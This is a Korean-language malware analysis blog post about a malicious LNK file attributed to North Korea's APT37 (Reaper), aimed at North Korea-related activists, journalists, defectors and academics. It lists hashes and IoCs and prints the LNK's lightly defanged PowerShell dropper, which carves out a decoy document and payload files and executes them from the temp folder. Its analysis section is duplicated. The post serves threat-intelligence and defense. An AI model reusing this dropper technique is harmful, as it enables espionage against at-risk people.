대북관계자를 노리는 북한 해킹 단체 리퍼(Reaper)에서 만든 악성코드-국가정보와 방첩 원고.lnk(2025.6.3)
Contents
오늘은 오래간만에 북한 해킹 단체 리퍼(Reaper,APT 37) 에서 만든 악성코드인 국가정보와 방첩 원고.lnk에 대해 알아보겠습니다.
RoKRAT은 대한민국에서 대북관계자 분들을 대상으로 하는 것이 특징이 있으며 대북 인권단체, 북한 취재 기자,탈북민,대북 관한 대학교수도 포함이 됩니다.
파일명:국가정보와 방첩 원고.lnk
사이즈:52 MB
MD5:f6d72abf9ca654a20bbaf23ea1c10a55
SHA-1:543e3b4b74257c3ffcd45dcdd8c842489a82bc07
SHA-256:90bf1f20f962d04f8ae3f936d0f9046da28a75fa2fb37f267ff0453f272c60a0
입니다.
악성코드 PowerShell 코드
StringData
{
namestring:
relativepath: not present
workingdir: not present
commandlinearguments: /k for /f "token(s)=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell
\v1(.)0\*rshell(.)exe /s /b /od') do call %a "$dirPath = Get-Location; if($dirPath -(M)atch 'Sys
t(e)m32' -or $dirPath -Matc(h) 'Program (F)iles') {$dirPath = '%te(m)p%'};$exs=@('(.)lnk');$l
nkPath = Get-ChildI(t)em -Path $dirPath -Recu(r)se *.* -File | where {$_.exten(s)ion -in $exs
} | wher(e)-object {$_.length -eq 0(x)033A6B2A} | Select-Object -ExpandProperty FullName ;$ln
kFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileA
ccess]::R(e)ad);$lnkFile.Seek(0x00001006, 0);$pdfFile=New-Object byte[] 0x0001C000;$lnkFile.
Re(a)d($pdfFile, 0, 0x0001(C)000);$p(d)fPath = $lnkPath.replace('(.)lnk','(.)hwp');sc $p(d)
fPath $pdfFile -Enc(o)ding Byte;& $pdfPath;$lnkFile.Seek(0x0(0)01D006, 0);$exeFile=New-Obje
ct byte[] 0x000(D)CB90;$lnkFile.Read($exeFile, 0, 0x000DCB90);($)exePath=$env:temp(+)'\ttf0
1(.)dat';sc $exePath $exeFile -Encoding (B)yte;$lnkFile.Seek(0x000F9(B)96,0);$stringByte =
New-Object byte[] 0x00(0)00634;$lnkFile.Read($stringByte, 0, 0x00000634); $batStrPath = $e
nv:temp+'\'+'ttf02.dat';$string = [Text.Encoding](:):GetEncoding('u(t)f-8').GetString($str
ingByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x000FA1CA
,0);$b(a)tByte = New-Object byte[] 0x000(0)014C;$lnkFile.Read($batByte, 0, 0x0000014C);$ex
ecutePath = $env:temp+'\'+'ttf0'+'3.b'(+)'a'(+)'t'; Write-Host $executePath; Write-Ho(s)t
$batStrPath; $bastString = [System.Text.Encoding]::UTF8.GetStri(n)g($batByte);$bastString
| Out-File -F(i)lePath $executePath -Encoding ascii; …
RoKRAT은 대한민국에서 대북관계자 분들을 대상으로 하는 것이 특징이 있으며 대북 인권단체, 북한 취재 기자,탈북민,대북 관한 대학교수도 포함이 됩니다.
파일명:국가정보와 방첩 원고.lnk
사이즈:52 MB
MD5:f6d72abf9ca654a20bbaf23ea1c10a55
SHA-1:543e3b4b74257c3ffcd45dcdd8c842489a82bc07
SHA-256:90bf1f20f962d04f8ae3f936d0f9046da28a75fa2fb37f267ff0453f272c60a0
입니다.
악성코드 PowerShell 코드
StringData
{
namestring:
relativepath: not present
workingdir: not present
commandlinearguments: /k for /f "token(s)=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell
\v1(.)0\*rshell(.)exe /s /b /od') do call %a "$dirPath = Get-Location; if($dirPath -(M)atch 'Sys
t(e)m32' -or $dirPath -Matc(h) 'Program (F)iles') {$dirPath = '%te(m)p%'};$exs=@('(.)lnk');$l
nkPath = Get-ChildI(t)em -Path $dirPath -Recu(r)se *.* -File | where {$_.exten(s)ion -in $exs
} | wher(e)-object {$_.length -eq 0(x)033A6B2A} | Select-Object -ExpandProperty FullName ;$ln
kFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileA
ccess]::R(e)ad);$lnkFile.Seek(0x00001006, 0);$pdfFile=New-Object byte[] 0x0001C000;$lnkFile.
Re(a)d($pdfFile, 0, 0x0001(C)000);$p(d)fPath = $lnkPath.replace('(.)lnk','(.)hwp');sc $p(d)
fPath $pdfFile -Enc(o)ding Byte;& $pdfPath;$lnkFile.Seek(0x0(0)01D006, 0);$exeFile=New-Obje
ct byte[] 0x000(D)CB90;$lnkFile.Read($exeFile, 0, 0x000DCB90);($)exePath=$env:temp(+)'\ttf0
1(.)dat';sc $exePath $exeFile -Encoding (B)yte;$lnkFile.Seek(0x000F9(B)96,0);$stringByte =
New-Object byte[] 0x00(0)00634;$lnkFile.Read($stringByte, 0, 0x00000634); $batStrPath = $e
nv:temp+'\'+'ttf02.dat';$string = [Text.Encoding](:):GetEncoding('u(t)f-8').GetString($str
ingByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x000FA1CA
,0);$b(a)tByte = New-Object byte[] 0x000(0)014C;$lnkFile.Read($batByte, 0, 0x0000014C);$ex
ecutePath = $env:temp+'\'+'ttf0'+'3.b'(+)'a'(+)'t'; Write-Host $executePath; Write-Ho(s)t
$batStrPath; $bastString = [System.Text.Encoding]::UTF8.GetStri(n)g($batByte);$bastString
| Out-File -F(i)lePath $executePath -Encoding ascii; …
IoC
90bf1f20f962d04f8ae3f936d0f9046da28a75fa2fb37f267ff0453f272c60a0
f6d72abf9ca654a20bbaf23ea1c10a55
543e3b4b74257c3ffcd45dcdd8c842489a82bc07
f6d72abf9ca654a20bbaf23ea1c10a55
543e3b4b74257c3ffcd45dcdd8c842489a82bc07